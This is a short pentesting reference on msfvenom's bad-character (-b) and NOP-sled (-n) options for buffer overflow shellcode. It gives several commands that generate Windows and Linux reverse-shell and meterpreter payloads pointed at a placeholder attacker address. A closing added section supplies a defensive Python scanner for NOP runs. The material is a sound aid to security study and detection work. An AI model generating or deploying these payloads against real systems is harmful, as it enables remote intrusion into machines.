Bad Characters & NOP Sleds
Bad Characters
Bad characters are bytes that break shellcode delivery in buffer overflow exploits (null bytes, newlines, etc.). The -b option excludes them from the generated payload.
# Exclude \x00 \x0a \x0d
msfvenom -p windows/shell_reverse_tcp LHOST=<ip> LPORT=<port> \
-b '\x00\x0a\x0d' -f c
# Common bad chars for HTTP-based exploits
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> \
-b '\x00\x0a\x0d\x20\x26\x2b\x3d' -f c
Generating Bad Char Test Strings
# Generate all bytes \x01-\xff as a string of \xNN escapes for comparison
python3 -c "print(''.join(f'\\\\x{i:02x}' for i in range(1,256)))"
NOP Sleds
The -n option prepends N bytes of NOPs (\x90) to the payload to absorb variance in where the instruction pointer lands.
# 16-byte NOP sled
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> \
-n 16 -f elf > nop_sled.elf
# 32-byte NOP sled on Windows shellcode
msfvenom -p windows/shell_reverse_tcp LHOST=<ip> LPORT=<port> \
-n 32 -b '\x00' -f c
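From the defender's side, the \x90 padding described above is a detectable pattern. The following is an added example, not part of the original page: it scans byte buffers for long runs of 0x90 and reports where they sit. The function names, the 16-byte threshold and the sample records are assumptions constructed for illustration, and it matches only the literal \x90 byte named above.

```python
import re


def find_nop_runs(data: bytes, min_len: int = 16):
    """Return (offset, length) for every run of >= min_len consecutive 0x90 bytes."""
    if min_len < 1:
        raise ValueError("min_len must be >= 1")
    # Bytes regex: \x90 repeated at least min_len times, matched greedily
    pattern = re.compile(rb"\x90{%d,}" % min_len)
    return [(m.start(), m.end() - m.start()) for m in pattern.finditer(data)]


def scan_records(records, min_len: int = 16):
    """Scan (label, bytes) pairs and return one finding per NOP run."""
    findings = []
    for label, blob in records:
        for offset, length in find_nop_runs(blob, min_len):
            end = offset + length
            findings.append({
                "record": label,
                "offset": offset,
                "length": length,
                # First bytes after the run, for an analyst to triage
                "follows": blob[end:end + 8].hex(),
            })
    return findings


# Constructed sample inputs (not real captures). \xcc is a stand-in
# for whatever follows the padding; it is not a payload.
SAMPLES = [
    ("req-1", b"GET /index.html HTTP/1.1\r\nHost: example.test\r\n\r\n"),
    ("req-2", b"A" * 64 + b"\x90" * 32 + b"\xcc" * 8),
    # Short runs below the threshold should not be flagged
    ("req-3", b"\x90" * 4 + b"binary-ish data" + b"\x90" * 8),
]

if __name__ == "__main__":
    for f in scan_records(SAMPLES):
        print(f"{f['record']}: {f['length']} x 0x90 at offset {f['offset']}, "
              f"followed by {f['follows']}")
```

Binary content such as images or compressed data can contain short 0x90 runs by chance, so the threshold trades false positives against missed short sleds.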